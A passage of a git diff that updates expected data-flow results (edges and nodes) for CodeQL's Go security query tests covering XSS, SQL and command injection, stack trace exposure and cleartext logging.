--- a/go/ql/test/library-tests/semmle/go/frameworks/BeegoOrm/StoredXss.expected +++ b/go/ql/test/library-tests/semmle/go/frameworks/BeegoOrm/StoredXss.expected @@ -24,7 +24,11 @@ edges | test.go:148:16:148:23 | &... | test.go:149:13:149:39 | type conversion | provenance | | | test.go:152:15:152:24 | &... | test.go:153:13:153:47 | type conversion | provenance | | | test.go:156:18:156:30 | &... | test.go:157:13:157:38 | type conversion | provenance | | +| test.go:160:2:160:23 | []type{args} [array] | test.go:160:14:160:22 | &... | provenance | | +| test.go:160:14:160:22 | &... | test.go:160:2:160:23 | []type{args} [array] | provenance | | | test.go:160:14:160:22 | &... | test.go:161:13:161:28 | type conversion | provenance | | +| test.go:164:2:164:25 | []type{args} [array] | test.go:164:15:164:24 | &... | provenance | | +| test.go:164:15:164:24 | &... | test.go:164:2:164:25 | []type{args} [array] | provenance | | | test.go:164:15:164:24 | &... | test.go:165:13:165:32 | type conversion | provenance | | nodes | test.go:80:13:80:16 | &... | semmle.label | &... | @@ -76,8 +80,10 @@ nodes | test.go:153:13:153:47 | type conversion | semmle.label | type conversion | | test.go:156:18:156:30 | &... | semmle.label | &... | | test.go:157:13:157:38 | type conversion | semmle.label | type conversion | +| test.go:160:2:160:23 | []type{args} [array] | semmle.label | []type{args} [array] | | test.go:160:14:160:22 | &... | semmle.label | &... | | test.go:161:13:161:28 | type conversion | semmle.label | type conversion | +| test.go:164:2:164:25 | []type{args} [array] | semmle.label | []type{args} [array] | | test.go:164:15:164:24 | &... | semmle.label | &... | | test.go:165:13:165:32 | type conversion | semmle.label | type conversion | subpaths diff --git a/go/ql/test/query-tests/Security/CWE-078/StoredCommand.expected b/go/ql/test/query-tests/Security/CWE-078/StoredCommand.expected index 12be518a98b..a0b34cd05b4 100644 
--- a/go/ql/test/query-tests/Security/CWE-078/StoredCommand.expected +++ b/go/ql/test/query-tests/Security/CWE-078/StoredCommand.expected @@ -3,12 +3,15 @@ edges | StoredCommand.go:11:2:11:27 | ... := ...[0] | StoredCommand.go:13:2:13:5 | rows | provenance | | | StoredCommand.go:13:2:13:5 | rows | StoredCommand.go:13:12:13:19 | &... | provenance | FunctionModel | +| StoredCommand.go:13:2:13:20 | []type{args} [array] | StoredCommand.go:13:12:13:19 | &... | provenance | | +| StoredCommand.go:13:12:13:19 | &... | StoredCommand.go:13:2:13:20 | []type{args} [array] | provenance | | | StoredCommand.go:13:12:13:19 | &... | StoredCommand.go:14:22:14:28 | cmdName | provenance | Sink:MaD:1 | models | 1 | Sink: os/exec; ; false; Command; ; ; Argument[0]; command-injection; manual | nodes | StoredCommand.go:11:2:11:27 | ... := ...[0] | semmle.label | ... := ...[0] | | StoredCommand.go:13:2:13:5 | rows | semmle.label | rows | +| StoredCommand.go:13:2:13:20 | []type{args} [array] | semmle.label | []type{args} [array] | | StoredCommand.go:13:12:13:19 | &... | semmle.label | &... | | StoredCommand.go:14:22:14:28 | cmdName | semmle.label | cmdName | subpaths diff --git a/go/ql/test/query-tests/Security/CWE-079/ReflectedXss.expected b/go/ql/test/query-tests/Security/CWE-079/ReflectedXss.expected index 647113f3c6b..321b1740c23 100644 --- a/go/ql/test/query-tests/Security/CWE-079/ReflectedXss.expected +++ b/go/ql/test/query-tests/Security/CWE-079/ReflectedXss.expected 
@@ -32,8 +32,10 @@ edges | contenttype.go:113:10:113:28 | call to FormValue | contenttype.go:114:50:114:53 | data | provenance | Src:MaD:8 | | reflectedxsstest.go:31:2:31:44 | ... := ...[0] | reflectedxsstest.go:32:34:32:37 | file | provenance | Src:MaD:7 | | reflectedxsstest.go:31:2:31:44 | ... := ...[1] | reflectedxsstest.go:34:46:34:60 | selection of Filename | provenance | Src:MaD:7 | +| reflectedxsstest.go:32:2:32:8 | definition of content | reflectedxsstest.go:33:49:33:55 | content | provenance | | | reflectedxsstest.go:32:2:32:38 | ... := ...[0] | reflectedxsstest.go:33:49:33:55 | content | provenance | | | reflectedxsstest.go:32:34:32:37 | file | reflectedxsstest.go:32:2:32:38 | ... := ...[0] | provenance | MaD:13 | +| reflectedxsstest.go:33:17:33:56 | []type{args} [array] | reflectedxsstest.go:32:2:32:8 | definition of content | provenance | | | reflectedxsstest.go:33:17:33:56 | []type{args} [array] | reflectedxsstest.go:33:17:33:56 | call to Sprintf | provenance | MaD:12 | | reflectedxsstest.go:33:17:33:56 | call to Sprintf | reflectedxsstest.go:33:10:33:57 | type conversion | provenance | | | reflectedxsstest.go:33:49:33:55 | content | reflectedxsstest.go:33:17:33:56 | []type{args} [array] | provenance | | 
@@ -63,11 +65,33 @@ edges | tst.go:48:14:48:19 | selection of Form | tst.go:48:14:48:34 | call to Get | provenance | Src:MaD:6 MaD:18 | | tst.go:48:14:48:34 | call to Get | tst.go:53:12:53:26 | type conversion | provenance | | | websocketXss.go:30:7:30:10 | definition of xnet | websocketXss.go:32:24:32:27 | xnet | provenance | Src:MaD:5 | +| websocketXss.go:30:7:30:10 | definition of xnet | websocketXss.go:32:24:32:27 | xnet | provenance | Src:MaD:5 | +| websocketXss.go:32:3:32:28 | []type{args} [array] | websocketXss.go:30:7:30:10 | definition of xnet | provenance | | +| websocketXss.go:32:24:32:27 | xnet | websocketXss.go:32:3:32:28 | []type{args} [array] | provenance | | | websocketXss.go:34:3:34:7 | definition of xnet2 | websocketXss.go:36:24:36:28 | xnet2 | provenance | Src:MaD:4 | +| websocketXss.go:34:3:34:7 | definition of xnet2 | websocketXss.go:36:24:36:28 | xnet2 | provenance | Src:MaD:4 | +| websocketXss.go:36:3:36:29 | []type{args} [array] | websocketXss.go:34:3:34:7 | definition of xnet2 | provenance | | +| websocketXss.go:36:24:36:28 | xnet2 | websocketXss.go:36:3:36:29 | []type{args} [array] | provenance | | | websocketXss.go:40:3:40:40 | ... := ...[1] | websocketXss.go:41:24:41:29 | nhooyr | provenance | Src:MaD:11 | +| websocketXss.go:40:3:40:40 | ... 
:= ...[1] | websocketXss.go:41:24:41:29 | nhooyr | provenance | Src:MaD:11 | +| websocketXss.go:40:6:40:11 | definition of nhooyr | websocketXss.go:41:24:41:29 | nhooyr | provenance | | +| websocketXss.go:40:6:40:11 | definition of nhooyr | websocketXss.go:41:24:41:29 | nhooyr | provenance | | +| websocketXss.go:41:3:41:30 | []type{args} [array] | websocketXss.go:40:6:40:11 | definition of nhooyr | provenance | | +| websocketXss.go:41:24:41:29 | nhooyr | websocketXss.go:41:3:41:30 | []type{args} [array] | provenance | | | websocketXss.go:46:7:46:16 | definition of gorillaMsg | websocketXss.go:48:24:48:33 | gorillaMsg | provenance | Src:MaD:1 | +| websocketXss.go:46:7:46:16 | definition of gorillaMsg | websocketXss.go:48:24:48:33 | gorillaMsg | provenance | Src:MaD:1 | +| websocketXss.go:48:3:48:34 | []type{args} [array] | websocketXss.go:46:7:46:16 | definition of gorillaMsg | provenance | | +| websocketXss.go:48:24:48:33 | gorillaMsg | websocketXss.go:48:3:48:34 | []type{args} [array] | provenance | | | websocketXss.go:50:3:50:10 | definition of gorilla2 | websocketXss.go:52:24:52:31 | gorilla2 | provenance | Src:MaD:2 | +| websocketXss.go:50:3:50:10 | definition of gorilla2 | websocketXss.go:52:24:52:31 | gorilla2 | provenance | Src:MaD:2 | +| websocketXss.go:52:3:52:32 | []type{args} [array] | websocketXss.go:50:3:50:10 | definition of gorilla2 | provenance | | +| websocketXss.go:52:24:52:31 | gorilla2 | websocketXss.go:52:3:52:32 | []type{args} [array] | provenance | | | websocketXss.go:54:3:54:38 | ... := ...[1] | websocketXss.go:55:24:55:31 | gorilla3 | provenance | Src:MaD:3 | +| websocketXss.go:54:3:54:38 | ... 
:= ...[1] | websocketXss.go:55:24:55:31 | gorilla3 | provenance | Src:MaD:3 | +| websocketXss.go:54:6:54:13 | definition of gorilla3 | websocketXss.go:55:24:55:31 | gorilla3 | provenance | | +| websocketXss.go:54:6:54:13 | definition of gorilla3 | websocketXss.go:55:24:55:31 | gorilla3 | provenance | | +| websocketXss.go:55:3:55:32 | []type{args} [array] | websocketXss.go:54:6:54:13 | definition of gorilla3 | provenance | | +| websocketXss.go:55:24:55:31 | gorilla3 | websocketXss.go:55:3:55:32 | []type{args} [array] | provenance | | models | 1 | Source: github.com/gorilla/websocket; ; false; ReadJSON; ; ; Argument[1]; remote; manual | | 2 | Source: github.com/gorilla/websocket; Conn; true; ReadJSON; ; ; Argument[0]; remote; manual | @@ -108,6 +132,7 @@ nodes | contenttype.go:114:50:114:53 | data | semmle.label | data | | reflectedxsstest.go:31:2:31:44 | ... := ...[0] | semmle.label | ... := ...[0] | | reflectedxsstest.go:31:2:31:44 | ... := ...[1] | semmle.label | ... := ...[1] | +| reflectedxsstest.go:32:2:32:8 | definition of content | semmle.label | definition of content | | reflectedxsstest.go:32:2:32:38 | ... := ...[0] | semmle.label | ... := ...[0] | | reflectedxsstest.go:32:34:32:37 | file | semmle.label | file | | reflectedxsstest.go:33:10:33:57 | type conversion | semmle.label | type conversion | 
@@ -142,15 +167,29 @@ nodes | tst.go:48:14:48:34 | call to Get | semmle.label | call to Get | | tst.go:53:12:53:26 | type conversion | semmle.label | type conversion | | websocketXss.go:30:7:30:10 | definition of xnet | semmle.label | definition of xnet | +| websocketXss.go:32:3:32:28 | []type{args} [array] | semmle.label | []type{args} [array] | +| websocketXss.go:32:24:32:27 | xnet | semmle.label | xnet | | websocketXss.go:32:24:32:27 | xnet | semmle.label | xnet | | websocketXss.go:34:3:34:7 | definition of xnet2 | semmle.label | definition of xnet2 | +| websocketXss.go:36:3:36:29 | []type{args} [array] | semmle.label | []type{args} [array] | +| websocketXss.go:36:24:36:28 | xnet2 | semmle.label | xnet2 | | websocketXss.go:36:24:36:28 | xnet2 | semmle.label | xnet2 | | websocketXss.go:40:3:40:40 | ... := ...[1] | semmle.label | ... := ...[1] | +| websocketXss.go:40:6:40:11 | definition of nhooyr | semmle.label | definition of nhooyr | +| websocketXss.go:41:3:41:30 | []type{args} [array] | semmle.label | []type{args} [array] | +| websocketXss.go:41:24:41:29 | nhooyr | semmle.label | nhooyr | | websocketXss.go:41:24:41:29 | nhooyr | semmle.label | nhooyr | | websocketXss.go:46:7:46:16 | definition of gorillaMsg | semmle.label | definition of gorillaMsg | +| websocketXss.go:48:3:48:34 | []type{args} [array] | semmle.label | []type{args} [array] | +| websocketXss.go:48:24:48:33 | gorillaMsg | semmle.label | gorillaMsg | | websocketXss.go:48:24:48:33 | gorillaMsg | semmle.label | gorillaMsg | | websocketXss.go:50:3:50:10 | definition of gorilla2 | semmle.label | definition of gorilla2 | +| websocketXss.go:52:3:52:32 | []type{args} [array] | semmle.label | []type{args} [array] | +| websocketXss.go:52:24:52:31 | gorilla2 | semmle.label | gorilla2 | | websocketXss.go:52:24:52:31 | gorilla2 | semmle.label | gorilla2 | | websocketXss.go:54:3:54:38 | ... := ...[1] | semmle.label | ... 
:= ...[1] | +| websocketXss.go:54:6:54:13 | definition of gorilla3 | semmle.label | definition of gorilla3 | +| websocketXss.go:55:3:55:32 | []type{args} [array] | semmle.label | []type{args} [array] | +| websocketXss.go:55:24:55:31 | gorilla3 | semmle.label | gorilla3 | | websocketXss.go:55:24:55:31 | gorilla3 | semmle.label | gorilla3 | subpaths diff --git a/go/ql/test/query-tests/Security/CWE-079/StoredXss.expected b/go/ql/test/query-tests/Security/CWE-079/StoredXss.expected index efe98650a4e..ebeedf3d0ef 100644 --- a/go/ql/test/query-tests/Security/CWE-079/StoredXss.expected +++ b/go/ql/test/query-tests/Security/CWE-079/StoredXss.expected @@ -1,7 +1,12 @@ edges | StoredXss.go:13:21:13:31 | call to Name | StoredXss.go:13:21:13:36 | ...+... | provenance | | | stored.go:18:3:18:28 | ... := ...[0] | stored.go:25:14:25:17 | rows | provenance | | +| stored.go:25:14:25:17 | rows | stored.go:25:24:25:26 | &... | provenance | FunctionModel | | stored.go:25:14:25:17 | rows | stored.go:25:29:25:33 | &... | provenance | FunctionModel | +| stored.go:25:14:25:34 | []type{args} [array] | stored.go:25:24:25:26 | &... | provenance | | +| stored.go:25:14:25:34 | []type{args} [array] | stored.go:25:29:25:33 | &... | provenance | | +| stored.go:25:24:25:26 | &... | stored.go:25:14:25:34 | []type{args} [array] | provenance | | +| stored.go:25:29:25:33 | &... | stored.go:25:14:25:34 | []type{args} [array] | provenance | | | stored.go:25:29:25:33 | &... | stored.go:30:22:30:25 | name | provenance | | | stored.go:59:30:59:33 | definition of path | stored.go:61:22:61:25 | path | provenance | | nodes 
@@ -9,6 +14,8 @@ nodes | StoredXss.go:13:21:13:36 | ...+... | semmle.label | ...+... | | stored.go:18:3:18:28 | ... := ...[0] | semmle.label | ... := ...[0] | | stored.go:25:14:25:17 | rows | semmle.label | rows | +| stored.go:25:14:25:34 | []type{args} [array] | semmle.label | []type{args} [array] | +| stored.go:25:24:25:26 | &... | semmle.label | &... | | stored.go:25:29:25:33 | &... | semmle.label | &... | | stored.go:30:22:30:25 | name | semmle.label | name | | stored.go:59:30:59:33 | definition of path | semmle.label | definition of path | diff --git a/go/ql/test/query-tests/Security/CWE-089/SqlInjection.expected b/go/ql/test/query-tests/Security/CWE-089/SqlInjection.expected index 1ce8c3d1dcf..9a7084ac836 100644 --- a/go/ql/test/query-tests/Security/CWE-089/SqlInjection.expected +++ b/go/ql/test/query-tests/Security/CWE-089/SqlInjection.expected @@ -26,6 +26,7 @@ | mongoDB.go:81:18:81:25 | pipeline | mongoDB.go:40:20:40:30 | call to Referer | mongoDB.go:81:18:81:25 | pipeline | This query depends on a $@. | mongoDB.go:40:20:40:30 | call to Referer | user-provided value | edges | SqlInjection.go:10:7:11:30 | []type{args} [array] | SqlInjection.go:10:7:11:30 | call to Sprintf | provenance | MaD:23 | +| SqlInjection.go:10:7:11:30 | []type{args} [array] | SqlInjection.go:11:3:11:29 | index expression | provenance | | | SqlInjection.go:10:7:11:30 | call to Sprintf | SqlInjection.go:12:11:12:11 | q | provenance | Sink:MaD:1 | | SqlInjection.go:11:3:11:9 | selection of URL | SqlInjection.go:11:3:11:17 | call to Query | provenance | Src:MaD:21 MaD:26 | | SqlInjection.go:11:3:11:17 | call to Query | SqlInjection.go:11:3:11:29 | index expression | provenance | | 
@@ -36,6 +37,7 @@ edges | issue48.go:18:17:18:17 | b | issue48.go:18:20:18:39 | &... | provenance | MaD:22 | | issue48.go:18:20:18:39 | &... | issue48.go:21:3:21:33 | index expression | provenance | | | issue48.go:20:8:21:34 | []type{args} [array] | issue48.go:20:8:21:34 | call to Sprintf | provenance | MaD:23 | +| issue48.go:20:8:21:34 | []type{args} [array] | issue48.go:21:3:21:33 | index expression | provenance | | | issue48.go:20:8:21:34 | call to Sprintf | issue48.go:22:11:22:12 | q3 | provenance | Sink:MaD:1 | | issue48.go:21:3:21:33 | index expression | issue48.go:20:8:21:34 | []type{args} [array] | provenance | | | issue48.go:21:3:21:33 | index expression | issue48.go:20:8:21:34 | call to Sprintf | provenance | FunctionModel | @@ -44,6 +46,7 @@ edges | issue48.go:28:17:28:18 | b2 | issue48.go:28:21:28:41 | &... | provenance | MaD:22 | | issue48.go:28:21:28:41 | &... | issue48.go:31:3:31:31 | selection of Category | provenance | | | issue48.go:30:8:31:32 | []type{args} [array] | issue48.go:30:8:31:32 | call to Sprintf | provenance | MaD:23 | +| issue48.go:30:8:31:32 | []type{args} [array] | issue48.go:31:3:31:31 | selection of Category | provenance | | | issue48.go:30:8:31:32 | call to Sprintf | issue48.go:32:11:32:12 | q4 | provenance | Sink:MaD:1 | | issue48.go:31:3:31:31 | selection of Category | issue48.go:30:8:31:32 | []type{args} [array] | provenance | | | issue48.go:31:3:31:31 | selection of Category | issue48.go:30:8:31:32 | call to Sprintf | provenance | FunctionModel | 
@@ -52,11 +55,13 @@ edges | issue48.go:37:24:37:38 | call to Query | issue48.go:37:17:37:50 | type conversion | provenance | | | issue48.go:37:53:37:73 | &... | issue48.go:40:3:40:31 | selection of Category | provenance | | | issue48.go:39:8:40:32 | []type{args} [array] | issue48.go:39:8:40:32 | call to Sprintf | provenance | MaD:23 | +| issue48.go:39:8:40:32 | []type{args} [array] | issue48.go:40:3:40:31 | selection of Category | provenance | | | issue48.go:39:8:40:32 | call to Sprintf | issue48.go:41:11:41:12 | q5 | provenance | Sink:MaD:1 | | issue48.go:40:3:40:31 | selection of Category | issue48.go:39:8:40:32 | []type{args} [array] | provenance | | | issue48.go:40:3:40:31 | selection of Category | issue48.go:39:8:40:32 | call to Sprintf | provenance | FunctionModel | | main.go:11:11:11:16 | selection of Form | main.go:11:11:11:28 | index expression | provenance | Src:MaD:18 Sink:MaD:1 | | main.go:15:11:15:84 | []type{args} [array] | main.go:15:11:15:84 | call to Sprintf | provenance | MaD:23 Sink:MaD:2 | +| main.go:15:11:15:84 | []type{args} [array] | main.go:15:63:15:83 | index expression | provenance | | | main.go:15:63:15:67 | selection of URL | main.go:15:63:15:75 | call to Query | provenance | Src:MaD:21 MaD:26 | | main.go:15:63:15:75 | call to Query | main.go:15:63:15:83 | index expression | provenance | | | main.go:15:63:15:83 | index expression | main.go:15:11:15:84 | []type{args} [array] | provenance | | 
@@ -71,6 +76,7 @@ edges | main.go:30:13:30:27 | call to Query | main.go:30:13:30:39 | index expression | provenance | | | main.go:30:13:30:39 | index expression | main.go:28:18:31:2 | struct literal [Category] | provenance | | | main.go:33:7:34:23 | []type{args} [array] | main.go:33:7:34:23 | call to Sprintf | provenance | MaD:23 | +| main.go:33:7:34:23 | []type{args} [array] | main.go:34:3:34:22 | selection of Category | provenance | | | main.go:33:7:34:23 | call to Sprintf | main.go:35:11:35:11 | q | provenance | Sink:MaD:1 | | main.go:34:3:34:13 | RequestData [pointer, Category] | main.go:34:3:34:13 | implicit dereference [Category] | provenance | | | main.go:34:3:34:13 | implicit dereference [Category] | main.go:34:3:34:22 | selection of Category | provenance | | @@ -84,6 +90,7 @@ edges | main.go:40:25:40:39 | call to Query | main.go:40:25:40:51 | index expression | provenance | | | main.go:40:25:40:51 | index expression | main.go:40:2:40:12 | implicit dereference [Category] | provenance | | | main.go:42:7:43:23 | []type{args} [array] | main.go:42:7:43:23 | call to Sprintf | provenance | MaD:23 | +| main.go:42:7:43:23 | []type{args} [array] | main.go:43:3:43:22 | selection of Category | provenance | | | main.go:42:7:43:23 | call to Sprintf | main.go:44:11:44:11 | q | provenance | Sink:MaD:1 | | main.go:43:3:43:13 | RequestData [pointer, Category] | main.go:43:3:43:13 | implicit dereference [Category] | provenance | | | main.go:43:3:43:13 | implicit dereference [Category] | main.go:43:3:43:22 | selection of Category | provenance | | 
@@ -97,6 +104,7 @@ edges | main.go:49:28:49:42 | call to Query | main.go:49:28:49:54 | index expression | provenance | | | main.go:49:28:49:54 | index expression | main.go:49:3:49:14 | star expression [Category] | provenance | | | main.go:51:7:52:23 | []type{args} [array] | main.go:51:7:52:23 | call to Sprintf | provenance | MaD:23 | +| main.go:51:7:52:23 | []type{args} [array] | main.go:52:3:52:22 | selection of Category | provenance | | | main.go:51:7:52:23 | call to Sprintf | main.go:53:11:53:11 | q | provenance | Sink:MaD:1 | | main.go:52:3:52:13 | RequestData [pointer, Category] | main.go:52:3:52:13 | implicit dereference [Category] | provenance | | | main.go:52:3:52:13 | implicit dereference [Category] | main.go:52:3:52:22 | selection of Category | provenance | | @@ -110,6 +118,7 @@ edges | main.go:58:28:58:42 | call to Query | main.go:58:28:58:54 | index expression | provenance | | | main.go:58:28:58:54 | index expression | main.go:58:3:58:14 | star expression [Category] | provenance | | | main.go:60:7:61:26 | []type{args} [array] | main.go:60:7:61:26 | call to Sprintf | provenance | MaD:23 | +| main.go:60:7:61:26 | []type{args} [array] | main.go:61:3:61:25 | selection of Category | provenance | | | main.go:60:7:61:26 | call to Sprintf | main.go:62:11:62:11 | q | provenance | Sink:MaD:1 | | main.go:61:3:61:25 | selection of Category | main.go:60:7:61:26 | []type{args} [array] | provenance | | | main.go:61:3:61:25 | selection of Category | main.go:60:7:61:26 | call to Sprintf | provenance | FunctionModel | diff --git a/go/ql/test/query-tests/Security/CWE-089/StringBreak.expected b/go/ql/test/query-tests/Security/CWE-089/StringBreak.expected index 5deab249337..a3d0c59798f 100644 --- a/go/ql/test/query-tests/Security/CWE-089/StringBreak.expected +++ b/go/ql/test/query-tests/Security/CWE-089/StringBreak.expected 
@@ -3,7 +3,12 @@ | StringBreakMismatched.go:17:26:17:32 | escaped | StringBreakMismatched.go:12:2:12:40 | ... := ...[0] | StringBreakMismatched.go:17:26:17:32 | escaped | If this $@ contains a single quote, it could break out of the enclosing quotes. | StringBreakMismatched.go:12:2:12:40 | ... := ...[0] | JSON value | | StringBreakMismatched.go:29:27:29:33 | escaped | StringBreakMismatched.go:24:2:24:40 | ... := ...[0] | StringBreakMismatched.go:29:27:29:33 | escaped | If this $@ contains a double quote, it could break out of the enclosing quotes. | StringBreakMismatched.go:24:2:24:40 | ... := ...[0] | JSON value | edges +| StringBreak.go:10:2:10:12 | definition of versionJSON | StringBreak.go:14:47:14:57 | versionJSON | provenance | | +| StringBreak.go:10:2:10:12 | definition of versionJSON | StringBreak.go:14:47:14:57 | versionJSON | provenance | | | StringBreak.go:10:2:10:40 | ... := ...[0] | StringBreak.go:14:47:14:57 | versionJSON | provenance | | +| StringBreak.go:10:2:10:40 | ... := ...[0] | StringBreak.go:14:47:14:57 | versionJSON | provenance | | +| StringBreak.go:14:22:14:58 | []type{args} [array] | StringBreak.go:10:2:10:12 | definition of versionJSON | provenance | | +| StringBreak.go:14:47:14:57 | versionJSON | StringBreak.go:14:22:14:58 | []type{args} [array] | provenance | | | StringBreakMismatched.go:12:2:12:40 | ... := ...[0] | StringBreakMismatched.go:13:29:13:47 | type conversion | provenance | | | StringBreakMismatched.go:13:13:13:62 | call to Replace | StringBreakMismatched.go:17:26:17:32 | escaped | provenance | | | StringBreakMismatched.go:13:29:13:47 | type conversion | StringBreakMismatched.go:13:13:13:62 | call to Replace | provenance | MaD:1 | 
@@ -13,7 +18,10 @@ edges models | 1 | Summary: strings; ; false; Replace; ; ; Argument[0]; ReturnValue; taint; manual | nodes +| StringBreak.go:10:2:10:12 | definition of versionJSON | semmle.label | definition of versionJSON | | StringBreak.go:10:2:10:40 | ... := ...[0] | semmle.label | ... := ...[0] | +| StringBreak.go:14:22:14:58 | []type{args} [array] | semmle.label | []type{args} [array] | +| StringBreak.go:14:47:14:57 | versionJSON | semmle.label | versionJSON | | StringBreak.go:14:47:14:57 | versionJSON | semmle.label | versionJSON | | StringBreakMismatched.go:12:2:12:40 | ... := ...[0] | semmle.label | ... := ...[0] | | StringBreakMismatched.go:13:13:13:62 | call to Replace | semmle.label | call to Replace | diff --git a/go/ql/test/query-tests/Security/CWE-209/StackTraceExposure.expected b/go/ql/test/query-tests/Security/CWE-209/StackTraceExposure.expected index c62c6126648..b3396e7451b 100644 --- a/go/ql/test/query-tests/Security/CWE-209/StackTraceExposure.expected +++ b/go/ql/test/query-tests/Security/CWE-209/StackTraceExposure.expected 
@@ -1,8 +1,16 @@ edges | test.go:14:2:14:4 | definition of buf | test.go:17:10:17:12 | buf | provenance | | +| test.go:14:2:14:4 | definition of buf | test.go:20:29:20:31 | buf | provenance | | +| test.go:15:2:15:4 | definition of buf | test.go:17:10:17:12 | buf | provenance | | +| test.go:15:2:15:4 | definition of buf | test.go:20:29:20:31 | buf | provenance | | +| test.go:20:2:20:32 | []type{args} [array] | test.go:15:2:15:4 | definition of buf | provenance | | +| test.go:20:29:20:31 | buf | test.go:20:2:20:32 | []type{args} [array] | provenance | | nodes | test.go:14:2:14:4 | definition of buf | semmle.label | definition of buf | +| test.go:15:2:15:4 | definition of buf | semmle.label | definition of buf | | test.go:17:10:17:12 | buf | semmle.label | buf | +| test.go:20:2:20:32 | []type{args} [array] | semmle.label | []type{args} [array] | +| test.go:20:29:20:31 | buf | semmle.label | buf | subpaths #select | test.go:17:10:17:12 | buf | test.go:14:2:14:4 | definition of buf | test.go:17:10:17:12 | buf | HTTP response depends on $@ and may be exposed to an external user. | test.go:14:2:14:4 | definition of buf | stack trace information | diff --git a/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.expected b/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.expected index 3435eff7775..31f709e456f 100644 --- a/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.expected +++ b/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.expected 
@@ -64,28 +64,61 @@ edges | passwords.go:8:12:8:12 | definition of x | passwords.go:9:14:9:14 | x | provenance | | | passwords.go:30:8:30:15 | password | passwords.go:8:12:8:12 | definition of x | provenance | | | passwords.go:34:28:34:35 | password | passwords.go:34:14:34:35 | ...+... | provenance | Config | +| passwords.go:36:2:36:5 | definition of obj1 | passwords.go:39:14:39:17 | obj1 | provenance | | +| passwords.go:36:2:36:5 | definition of obj1 | passwords.go:39:14:39:17 | obj1 | provenance | | +| passwords.go:36:10:38:2 | struct literal | passwords.go:39:14:39:17 | obj1 | provenance | | | passwords.go:36:10:38:2 | struct literal | passwords.go:39:14:39:17 | obj1 | provenance | | | passwords.go:37:13:37:13 | x | passwords.go:36:10:38:2 | struct literal | provenance | Config | +| passwords.go:39:2:39:18 | []type{args} [array] | passwords.go:36:2:36:5 | definition of obj1 | provenance | | +| passwords.go:39:14:39:17 | obj1 | passwords.go:39:2:39:18 | []type{args} [array] | provenance | | +| passwords.go:41:2:41:5 | definition of obj2 | passwords.go:44:14:44:17 | obj2 | provenance | | +| passwords.go:41:2:41:5 | definition of obj2 | passwords.go:44:14:44:17 | obj2 | provenance | | +| passwords.go:41:10:43:2 | struct literal | passwords.go:44:14:44:17 | obj2 | provenance | | | passwords.go:41:10:43:2 | struct literal | passwords.go:44:14:44:17 | obj2 | provenance | | | passwords.go:42:6:42:13 | password | passwords.go:41:10:43:2 | struct literal | provenance | Config | +| passwords.go:44:2:44:18 | []type{args} [array] | passwords.go:41:2:41:5 | definition of obj2 | provenance | | +| passwords.go:44:14:44:17 | obj2 | passwords.go:44:2:44:18 | []type{args} [array] | provenance | | | passwords.go:46:6:46:9 | definition of obj3 | passwords.go:47:14:47:17 | obj3 | provenance | | +| passwords.go:46:6:46:9 | definition of obj3 | passwords.go:47:14:47:17 | obj3 | provenance | | +| passwords.go:47:2:47:18 | []type{args} [array] | passwords.go:46:6:46:9 | definition of 
obj3 | provenance | | +| passwords.go:47:14:47:17 | obj3 | passwords.go:47:2:47:18 | []type{args} [array] | provenance | | | passwords.go:48:11:48:18 | password | passwords.go:46:6:46:9 | definition of obj3 | provenance | Config | +| passwords.go:85:2:85:14 | definition of utilityObject | passwords.go:88:14:88:26 | utilityObject | provenance | | +| passwords.go:85:2:85:14 | definition of utilityObject | passwords.go:88:14:88:26 | utilityObject | provenance | | +| passwords.go:85:19:87:2 | struct literal | passwords.go:88:14:88:26 | utilityObject | provenance | | | passwords.go:85:19:87:2 | struct literal | passwords.go:88:14:88:26 | utilityObject | provenance | | | passwords.go:86:16:86:36 | call to make | passwords.go:85:19:87:2 | struct literal | provenance | Config | +| passwords.go:88:2:88:27 | []type{args} [array] | passwords.go:85:2:85:14 | definition of utilityObject | provenance | | +| passwords.go:88:14:88:26 | utilityObject | passwords.go:88:2:88:27 | []type{args} [array] | provenance | | | passwords.go:90:12:90:19 | password | passwords.go:91:23:91:28 | secret | provenance | | | passwords.go:101:33:101:40 | password | passwords.go:101:15:101:40 | ...+... | provenance | Config | | passwords.go:107:34:107:41 | password | passwords.go:107:16:107:41 | ...+... | provenance | Config | | passwords.go:112:33:112:40 | password | passwords.go:112:15:112:40 | ...+... | provenance | Config | | passwords.go:116:28:116:36 | password1 | passwords.go:116:28:116:45 | call to String | provenance | Config | | passwords.go:116:28:116:45 | call to String | passwords.go:116:14:116:45 | ...+... 
| provenance | Config | +| passwords.go:118:2:118:7 | definition of config | passwords.go:125:14:125:19 | config | provenance | | +| passwords.go:118:2:118:7 | definition of config | passwords.go:125:14:125:19 | config | provenance | | +| passwords.go:118:2:118:7 | definition of config [x] | passwords.go:125:14:125:19 | config [x] | provenance | | +| passwords.go:118:2:118:7 | definition of config [x] | passwords.go:126:14:126:19 | config [x] | provenance | | +| passwords.go:118:2:118:7 | definition of config [y] | passwords.go:125:14:125:19 | config [y] | provenance | | +| passwords.go:118:2:118:7 | definition of config [y] | passwords.go:127:14:127:19 | config [y] | provenance | | | passwords.go:118:12:123:2 | struct literal | passwords.go:125:14:125:19 | config | provenance | | +| passwords.go:118:12:123:2 | struct literal | passwords.go:125:14:125:19 | config | provenance | | +| passwords.go:118:12:123:2 | struct literal [x] | passwords.go:125:14:125:19 | config [x] | provenance | | | passwords.go:118:12:123:2 | struct literal [x] | passwords.go:126:14:126:19 | config [x] | provenance | | +| passwords.go:118:12:123:2 | struct literal [y] | passwords.go:125:14:125:19 | config [y] | provenance | | | passwords.go:118:12:123:2 | struct literal [y] | passwords.go:127:14:127:19 | config [y] | provenance | | | passwords.go:119:13:119:13 | x | passwords.go:118:12:123:2 | struct literal | provenance | Config | | passwords.go:121:13:121:20 | password | passwords.go:118:12:123:2 | struct literal | provenance | Config | | passwords.go:121:13:121:20 | password | passwords.go:118:12:123:2 | struct literal [x] | provenance | | | passwords.go:122:13:122:25 | call to getPassword | passwords.go:118:12:123:2 | struct literal | provenance | Config | | passwords.go:122:13:122:25 | call to getPassword | passwords.go:118:12:123:2 | struct literal [y] | provenance | | +| passwords.go:125:2:125:20 | []type{args} [array, x] | passwords.go:118:2:118:7 | definition of config [x] | 
